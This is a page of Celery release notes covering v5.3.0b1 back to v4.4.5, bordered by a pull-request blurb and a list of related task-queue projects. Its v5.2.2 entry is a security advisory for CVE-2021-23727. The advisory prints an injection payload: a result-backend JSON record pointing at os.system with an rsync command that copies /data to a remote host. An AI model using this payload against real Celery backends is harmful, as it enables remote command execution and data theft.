    Switch between thread & global for app.backend

    Note: Before submitting this pull request, please review our contributing guidelines.

    Description

    For app.backend, switch between self._local and self._global as cache, depending on whether the environment is fully thread-safe (eg. eventlet), and whether the backend is thread-safe (eg. Redis)

    Fixes:

    • #7960
    • #6819
    opened by chenseanxy 11
Releases(v5.3.0b1)
  • v5.3.0b1(Aug 1, 2022)

    Release date: 2022-08-01 5:15 P.M UTC+6:00

    Release by: Asif Saif Uddin

    • Canvas Header Stamping (#7384).
    • async chords should pass it's kwargs to the group/body.
    • beat: Suppress banner output with the quiet option (#7608).
    • Fix honor Django's TIME_ZONE setting.
    • Don't warn about DEBUG=True for Django.
    • Fixed the on_after_finalize cannot access tasks due to deadlock.
    • Bump kombu>=5.3.0b1,<6.0.
    • Make default worker state limits configurable (#7609).
    • Only clear the cache if there are no active writers.
    • Billiard 4.0.1
    Source code(tar.gz)
    Source code(zip)
  • v5.3.0a1(Jun 29, 2022)

    Release date: 2022-06-29 5:15 P.M UTC+6:00

    Release by: Asif Saif Uddin

    • Remove Python 3.4 compatibility code.
    • call ping to set connection attr for avoiding redis parse_response error.
    • Use importlib instead of deprecated pkg_resources.
    • fix #7245 uid duplicated in command params.
    • Fix subscribed_to maybe empty (#7232).
    • Fix: Celery beat sleeps 300 seconds sometimes even when it should run a task within a few seconds (e.g. 13 seconds) #7290.
    • Add security_key_password option (#7292).
    • Limit elasticsearch support to below version 8.0.
    • try new major release of pytest 7 (#7330).
    • broker_connection_retry should no longer apply on startup (#7300).
    • Remove __ne__ methods (#7257).
    • fix #7200 uid and gid.
    • Remove exception-throwing from the signal handler.
    • Add mypy to the pipeline (#7383).
    • Expose more debugging information when receiving unknown tasks. (#7405)
    • Avoid importing buf_t from billiard's compat module as it was removed.
    • Avoid negating a constant in a loop. (#7443)
    • Ensure expiration is of float type when migrating tasks (#7385).
    • load_extension_class_names - correct module_name (#7406)
    • Bump pymongo[srv]>=4.0.2.
    • Use inspect.getgeneratorstate in asynpool.gen_not_started (#7476).
    • Fix test with missing .get() (#7479).
    • azure-storage-blob>=12.11.0
    • Make start_worker, setup_default_app reusable outside of pytest.
    • Ensure a proper error message is raised when id for key is empty (#7447).
    • Crontab string representation does not match UNIX crontab expression.
    • Worker should exit with ctx.exit to get the right exitcode for non-zero.
    • Fix expiration check (#7552).
    • Use callable built-in.
    • Include dont_autoretry_for option in tasks. (#7556)
    • fix: Syntax error in arango query.
    • Fix custom headers propagation on task retries (#7555).
    • Silence backend warning when eager results are stored.
    • Reduce prefetch count on restart and gradually restore it (#7350).
    • Improve workflow primitive subclassing (#7593).
    • test kombu>=5.3.0a1,<6.0 (#7598).
    • Canvas Header Stamping (#7384).
    Source code(tar.gz)
    Source code(zip)
  • v5.2.7(May 29, 2022)

    Release date: 2022-5-26 12:15 P.M UTC+2:00

    Release by: Omer Katz

    • Fix packaging issue which causes poetry 1.2b1 and above to fail install Celery (#7534).
    Source code(tar.gz)
    Source code(zip)
  • v5.2.6(Apr 5, 2022)

    Release date: 2022-4-04 21:15 P.M UTC+2:00

    Release by: Omer Katz

    load_extension_class_names - correct module_name (#7433).
    
    :   This fixes a regression caused by #7218.
    
    Source code(tar.gz)
    Source code(zip)
  • v5.2.5(Apr 3, 2022)

    Release date: 2022-4-03 20:42 P.M UTC+2:00

    Release by: Omer Katz

    This release was yanked due to a regression caused by the PR below

    • Use importlib instead of deprecated pkg_resources (#7218).
    Source code(tar.gz)
    Source code(zip)
  • v5.2.4(Apr 3, 2022)

  • v5.2.3(Dec 29, 2021)

    Release date: 2021-12-29 12:00 P.M UTC+6:00

    Release by: Asif Saif Uddin

    • Allow redis >= 4.0.2.
    • Upgrade minimum required pymongo version to 3.11.1.
    • tested pypy3.8 beta (#6998).
    • Split Signature.__or__ into subclasses' __or__ (#7135).
    • Prevent duplication in event loop on Consumer restart.
    • Restrict setuptools>=59.1.1,<59.7.0.
    • Kombu bumped to v5.2.3
    • py-amqp bumped to v5.0.9
    • Some docs & CI improvements.
    Source code(tar.gz)
    Source code(zip)
  • v5.2.2(Dec 26, 2021)

    Release date: 2021-12-26 16:30 P.M UTC+2:00

    Release by: Omer Katz

    • Various documentation fixes.

    • Fix CVE-2021-23727 (Stored Command Injection security vulnerability).

      When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as: os.system("rsync /data [email protected]:~/data") by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payload rsync /data [email protected]:~/data as the exception arguments like so:

      {
            "exc_module": "os",
            'exc_type': "system",
            "exc_message": "rsync /data [email protected]:~/data"
      }
      

      According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.

    Source code(tar.gz)
    Source code(zip)
  • v5.2.1(Nov 16, 2021)

    Release date: 2021-11-16 8.55 P.M UTC+6:00

    Release by: Asif Saif Uddin

    • Fix rstrip usage on bytes instance in ProxyLogger.
    • Pass logfile to ExecStop in celery.service example systemd file.
    • fix: reduce latency of AsyncResult.get under gevent (#7052)
    • Limit redis version: <4.0.0.
    • Bump min kombu version to 5.2.2.
    • Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.
    • Remove dependency to case (#7077).
    • fix: task expiration is timezone aware if needed (#7065).
    • Initial testing of pypy-3.8 beta to CI.
    • Docs, CI & tests cleanups.
    Source code(tar.gz)
    Source code(zip)
  • v5.2.0(Nov 8, 2021)

    Release date: 2021-11-08 7.15 A.M UTC+6:00

    Release by: Asif Saif Uddin

    • Prevent from subscribing to empty channels (#7040)
    • fix register_task method.
    • Fire task failure signal on final reject (#6980)
    • Limit pymongo version: <3.12.1 (#7041)
    • Bump min kombu version to 5.2.1
    Source code(tar.gz)
    Source code(zip)
  • v5.2.0rc2(Nov 5, 2021)

    Release date: 2021-11-02 1.54 P.M UTC+3:00

    Release by: Naomi Elstein

    • Bump Python 3.10.0 to rc2.
    • [pre-commit.ci] pre-commit autoupdate (#6972).
    • autopep8.
    • Prevent worker to send expired revoked items upon hello command (#6975).
    • docs: clarify the 'keeping results' section (#6979).
    • Update deprecated task module removal in 5.0 documentation (#6981).
    • [pre-commit.ci] pre-commit autoupdate.
    • try python 3.10 GA.
    • mention python 3.10 on readme.
    • Documenting the default consumer_timeout value for rabbitmq >= 3.8.15.
    • Azure blockblob backend parametrized connection/read timeouts (#6978).
    • Add as_uri method to azure block blob backend.
    • Add possibility to override backend implementation with celeryconfig (#6879).
    • [pre-commit.ci] pre-commit autoupdate.
    • try to fix deprecation warning.
    • [pre-commit.ci] pre-commit autoupdate.
    • not needed anyore.
    • not needed anyore.
    • not used anymore.
    • add github discussions forum
    Source code(tar.gz)
    Source code(zip)
  • v5.2.0rc1(Sep 27, 2021)

    Release date: 2021-09-26 4.04 P.M UTC+3:00

    Release by: Omer Katz

    • Kill all workers when main process exits in prefork model (#6942).
    • test kombu 5.2.0rc1 (#6947).
    • try moto 2.2.x (#6948).
    • Prepared Hacker News Post on Release Action.
    • update setup with python 3.7 as minimum.
    • update kombu on setupcfg.
    • Added note about automatic killing all child processes of worker after its termination.
    • [pre-commit.ci] pre-commit autoupdate.
    • Move importskip before greenlet import (#6956).
    • amqp: send expiration field to broker if requested by user (#6957).
    • Single line drift warning.
    • canvas: fix kwargs argument to prevent recursion (#6810) (#6959).
    • Allow to enable Events with app.conf mechanism.
    • Warn when expiration date is in the past.
    • Add the Framework :: Celery trove classifier.
    • Give indication whether the task is replacing another (#6916).
    • Make setup.py executable.
    • Bump version: 5.2.0b3 → 5.2.0rc1.
    Source code(tar.gz)
    Source code(zip)
  • v5.2.0b3(Sep 4, 2021)

    Release date: 2021-09-02 8.38 P.M UTC+3:00

    Release by: Omer Katz

    • Add args to LOG_RECEIVED (fixes #6885) (#6898).
    • Terminate job implementation for eventlet concurrency backend (#6917).
    • Add cleanup implementation to filesystem backend (#6919).
    • [pre-commit.ci] pre-commit autoupdate (#69).
    • Add before_start hook (fixes #4110) (#6923).
    • Restart consumer if connection drops (#6930).
    • Remove outdated optimization documentation (#6933).
    • added https verification check functionality in arangodb backend (#6800).
    • Drop Python 3.6 support.
    • update supported python versions on readme.
    • [pre-commit.ci] pre-commit autoupdate (#6935).
    • Remove appveyor configuration since we migrated to GA.
    • pyugrade is now set to upgrade code to 3.7.
    • Drop exclude statement since we no longer test with pypy-3.6.
    • 3.10 is not GA so it's not supported yet.
    • Celery 5.1 or earlier support Python 3.6.
    • Fix linting error.
    • fix: Pass a Context when chaining fail results (#6899).
    • Bump version: 5.2.0b2 → 5.2.0b3.
    Source code(tar.gz)
    Source code(zip)
  • v5.2.0b2(Sep 1, 2021)

    Release date: 2021-08-17 5.35 P.M UTC+3:00

    Release by: Omer Katz

    • Test windows on py3.10rc1 and pypy3.7 (#6868).
    • Route chord_unlock task to the same queue as chord body (#6896).
    • Add message properties to app.tasks.Context (#6818).
    • handle already converted LogLevel and JSON (#6915).
    • 5.2 is codenamed dawn-chorus.
    • Bump version: 5.2.0b1 → 5.2.0b2.
    Source code(tar.gz)
    Source code(zip)
  • v5.2.0b1(Aug 11, 2021)

    Release date: 2021-08-11 5.42 P.M UTC+3:00

    Release by: Omer Katz

    • Add Python 3.10 support (#6807).
    • Fix docstring for Signal.send to match code (#6835).
    • No blank line in log output (#6838).
    • Chords get body_type independently to handle cases where body.type does not exist (#6847).
    • Fix #6844 by allowing safe queries via app.inspect().active() (#6849).
    • Fix multithreaded backend usage (#6851).
    • Fix Open Collective donate button (#6848).
    • Fix setting worker concurrency option after signal (#6853).
    • Make ResultSet.on_ready promise hold a weakref to self (#6784).
    • Update configuration.rst.
    • Discard jobs on flush if synack isn't enabled (#6863).
    • Bump click version to 8.0 (#6861).
    • Amend IRC network link to Libera (#6837).
    • Import celery lazily in pytest plugin and unignore flake8 F821, "undefined name '...'" (#6872).
    • Fix inspect --json output to return valid json without --quiet.
    • Remove celery.task references in modules, docs (#6869).
    • The Consul backend must correctly associate requests and responses (#6823).
    Source code(tar.gz)
    Source code(zip)
  • v5.1.2(Jul 12, 2021)

    Release date: 2021-06-28 16.15 P.M UTC+3:00

    Release by: Omer Katz

    • When chords fail, correctly call errbacks. (#6814)

      We had a special case for calling errbacks when a chord failed which assumed they were old style. This change ensures that we call the proper errback dispatch method which understands new and old style errbacks, and adds test to confirm that things behave as one might expect now.

    • Avoid using the Event.isSet() deprecated alias. (#6824)

    • Reintroduce sys.argv default behaviour for Celery.start(). (#6825)

    Source code(tar.gz)
    Source code(zip)
  • v5.1.1(Jun 18, 2021)

    Release date: 2021-06-17 16.10 P.M UTC+3:00

    Release by: Omer Katz

    • Fix --pool=threads support in command line options parsing. (#6787)

    • Fix LoggingProxy.write() return type. (#6791)

    • Couchdb key is now always coerced into a string. (#6781)

    grp is no longer imported unconditionally. (#6804)
    
    :   This fixes a regression in 5.1.0 when running Celery in non-unix
        systems.
    
    • Ensure regen utility class gets marked as done when concertised. (#6789)

    • Preserve call/errbacks of replaced tasks. (#6770)

    • Use single-lookahead for regen consumption. (#6799)

    • Revoked tasks are no longer incorrectly marked as retried. (#6812, #6816)

    Source code(tar.gz)
    Source code(zip)
  • v5.1.0(May 26, 2021)

    Release date: 2021-05-23 19.20 P.M UTC+3:00

    Release by: Omer Katz

    • celery -A app events -c camera now works as expected. (#6774)
    • Bump minimum required Kombu version to 5.1.0.
    Source code(tar.gz)
    Source code(zip)
  • v5.1.0rc1(May 19, 2021)

    Release date: 2021-05-02 16.06 P.M UTC+3:00

    Release by: Omer Katz

    • Celery Mailbox accept and serializer parameters are initialized from configuration. (#6757)
    • Error propagation and errback calling for group-like signatures now works as expected. (#6746)
    • Fix sanitization of passwords in sentinel URIs. (#6765)
    • Add LOG_RECEIVED to customize logging. (#6758)
    Source code(tar.gz)
    Source code(zip)
  • v5.1.0b2(May 2, 2021)

    Release date: 2021-05-02 16.06 P.M UTC+3:00

    Release by: Omer Katz

    • Fix the behavior of our json serialization which regressed in 5.0. (#6561)
    • Add support for SQLAlchemy 1.4. (#6709)
    • Safeguard against schedule entry without kwargs. (#6619)
    • task.apply_async(ignore_result=True) now avoids persisting the results. (#6713)
    • Update systemd tmpfiles path. (#6688)
    • Ensure AMQPContext exposes an app attribute. (#6741)
    • Inspect commands accept arguments again (#6710).
    • Chord counting of group children is now accurate. (#6733)
    • Add a setting worker_cancel_long_running_tasks_on_connection_loss{.interpreted-text role="setting"} to terminate tasks with late acknowledgement on connection loss. (#6654)
    • The task-revoked event and the task_revoked signal are not duplicated when Request.on_failure is called. (#6654)
    • Restore pickling support for Retry. (#6748)
    • Add support in the redis result backend for authenticating with a username. (#6750)
    • The worker_pool{.interpreted-text role="setting"} setting is now respected correctly. (#6711)
    Source code(tar.gz)
    Source code(zip)
  • v5.1.0b1(Apr 2, 2021)

    Release date: 2021-04-02 10.25 P.M UTC+6:00

    Release by: Asif Saif Uddin

    • Add sentinel_kwargs to Redis Sentinel docs.
    • Depend on the maintained python-consul2 library. (#6544).
    • Use result_chord_join_timeout instead of hardcoded default value.
    • Upgrade AzureBlockBlob storage backend to use Azure blob storage library v12 (#6580).
    • Improved integration tests.
    • pass_context for handle_preload_options decorator (#6583).
    • Makes regen less greedy (#6589).
    • Pytest worker shutdown timeout (#6588).
    • Exit celery with non zero exit value if failing (#6602).
    • Raise BackendStoreError when set value is too large for Redis.
    • Trace task optimizations are now set via Celery app instance.
    • Make trace_task_ret and fast_trace_task public.
    • reset_worker_optimizations and create_request_cls has now app as optional parameter.
    • Small refactor in exception handling of on_failure (#6633).
    • Fix for issue #5030 "Celery Result backend on Windows OS".
    • Add store_eager_result setting so eager tasks can store result on the result backend (#6614).
    • Allow heartbeats to be sent in tests (#6632).
    • Fixed default visibility timeout note in sqs documentation.
    • Support Redis Sentinel with SSL.
    • Simulate more exhaustive delivery info in apply().
    • Start chord header tasks as soon as possible (#6576).
    • Forward shadow option for retried tasks (#6655).
    • --quiet flag now actually makes celery avoid producing logs (#6599).
    • Update platforms.py "superuser privileges" check (#6600).
    • Remove unused property [autoregister]{.title-ref} from the Task class (#6624).
    • fnmatch.translate() already translates globs for us. (#6668).
    • Upgrade some syntax to Python 3.6+.
    • Add [azureblockblob_base_path]{.title-ref} config (#6669).
    • Fix checking expiration of X.509 certificates (#6678).
    • Drop the lzma extra.
    • Fix JSON decoding errors when using MongoDB as backend (#6675).
    • Allow configuration of RedisBackend's health_check_interval (#6666).
    • Safeguard against schedule entry without kwargs (#6619).
    • Docs only - SQS broker - add STS support (#6693) through kombu.
    • Drop fun_accepts_kwargs backport.
    • Tasks can now have required kwargs at any order (#6699).
    • Min py-amqp 5.0.6.
    • min billiard is now 3.6.4.0.
    • Minimum kombu now is5.1.0b1.
    • Numerous docs fixes.
    • Moved CI to github action.
    • Updated deployment scripts.
    • Updated docker.
    • Initial support of python 3.9 added.
    Source code(tar.gz)
    Source code(zip)
  • v4.4.7(Jul 31, 2020)

    4.4.7

    :release-date: 2020-07-31 11.45 P.M UTC+6:00 :release-by: Asif Saif Uddin

    • Add task_received, task_rejected and task_unknown to signals module.
    • [ES backend] add 401 as safe for retry.
    • treat internal errors as failure.
    • Remove redis fanout caveats.
    • FIX: -A and --args should behave the same. (#6223)
    • Class-based tasks autoretry (#6233)
    • Preserve order of group results with Redis result backend (#6218)
    • Replace future with celery.five Fixes #6250, and reraise to include
    • Fix REMAP_SIGTERM=SIGQUIT not working
    • (Fixes#6258) MongoDB: fix for serialization issue (#6259)
    • Make use of ordered sets in Redis opt-in
    • Test, CI, Docker, style and minor doc impovements.
    Source code(tar.gz)
    Source code(zip)
  • v4.4.5(Jun 8, 2020)

Owner
Celery
Distributed Programming framework for Python.
Celery
Asynchronous serverless task queue with timed leasing of tasks

Asynchronous serverless task queue with timed leasing of tasks. Threaded implementations for SQS and local filesystem.

24 Dec 14, 2022
Asynchronous tasks in Python with Celery + RabbitMQ + Redis

python-asynchronous-tasks Setup & Installation Create a virtual environment and install the dependencies: $ python -m venv venv $ source env/bin/activ

Valon Januzaj 40 Dec 03, 2022
Dagon - An Asynchronous Task Graph Execution Engine

Dagon - An Asynchronous Task Graph Execution Engine Dagon is a job execution sys

8 Nov 17, 2022
Sync Laravel queue with Python. Provides an interface for communication between Laravel and Python.

Python Laravel Queue Queue sync between Python and Laravel using Redis driver. You can process jobs dispatched from Laravel in Python. NOTE: This pack

Sinan Bekar 3 Oct 01, 2022
Queuing with django celery and rabbitmq

queuing-with-django-celery-and-rabbitmq Install Python 3.6 or above sudo apt-get install python3.6 Install RabbitMQ sudo apt-get install rabbitmq-ser

1 Dec 22, 2021
Pyramid configuration with celery integration. Allows you to use pyramid .ini files to configure celery and have your pyramid configuration inside celery tasks.

Getting Started Include pyramid_celery either by setting your includes in your .ini, or by calling config.include('pyramid_celery'): pyramid.includes

John Anderson 102 Dec 02, 2022
Add you own metrics to your celery backend

Add you own metrics to your celery backend

Gandi 1 Dec 16, 2022
PostgreSQL-based Task Queue for Python

Procrastinate: PostgreSQL-based Task Queue for Python Procrastinate is an open-source Python 3.7+ distributed task processing library, leveraging Post

Procrastinate 486 Jan 08, 2023
Py_extract is a simple, light-weight python library to handle some extraction tasks using less lines of code

py_extract Py_extract is a simple, light-weight python library to handle some extraction tasks using less lines of code. Still in Development Stage! I

I'm Not A Bot #Left_TG 7 Nov 07, 2021
FastAPI with Celery

Minimal example utilizing fastapi and celery with RabbitMQ for task queue, Redis for celery backend and flower for monitoring the celery tasks.

Grega Vrbančič 371 Jan 01, 2023
Django database backed celery periodic task scheduler with support for task dependency graph

Djag Scheduler (Dj)ango Task D(AG) (Scheduler) Overview Djag scheduler associates scheduling information with celery tasks The task schedule is persis

Mohith Reddy 3 Nov 25, 2022
A multiprocessing distributed task queue for Django

A multiprocessing distributed task queue for Django Features Multiprocessing worker pool Asynchronous tasks Scheduled, cron and repeated tasks Signed

Ilan Steemers 1.7k Jan 03, 2023
Mr. Queue - A distributed worker task queue in Python using Redis & gevent

MRQ MRQ is a distributed task queue for python built on top of mongo, redis and gevent. Full documentation is available on readthedocs Why? MRQ is an

Pricing Assistant 871 Dec 25, 2022
Distributed Task Queue (development branch)

Version: 5.1.0b1 (singularity) Web: https://docs.celeryproject.org/en/stable/index.html Download: https://pypi.org/project/celery/ Source: https://git

Celery 20.7k Jan 01, 2023
Flower is a web based tool for monitoring and administrating Celery clusters.

Real-time monitor and web admin for Celery distributed task queue

Mher Movsisyan 5.5k Jan 02, 2023
A fully-featured e-commerce application powered by Django

kobbyshop - Django Ecommerce App A fully featured e-commerce application powered by Django. Sections Project Description Features Technology Setup Scr

Kwabena Yeboah 2 Feb 15, 2022
A fast and reliable background task processing library for Python 3.

dramatiq A fast and reliable distributed task processing library for Python 3. Changelog: https://dramatiq.io/changelog.html Community: https://groups

Bogdan Popa 3.4k Jan 01, 2023
Redis-backed message queue implementation that can hook into a discord bot written with hikari-lightbulb.

Redis-backed FIFO message queue implementation that can hook into a discord bot written with hikari-lightbulb. This is eventually intended to be the backend communication between a bot and a web dash

thomm.o 7 Dec 05, 2022
A Django app that integrates with Dramatiq.

django_dramatiq django_dramatiq is a Django app that integrates with Dramatiq. Requirements Django 1.11+ Dramatiq 0.18+ Example You can find an exampl

Bogdan Popa 261 Dec 25, 2022
Beatserver, a periodic task scheduler for Django 🎵

Beat Server Beatserver, a periodic task scheduler for django channels | beta software How to install Prerequirements: Follow django channels documenta

Raja Simon 130 Dec 17, 2022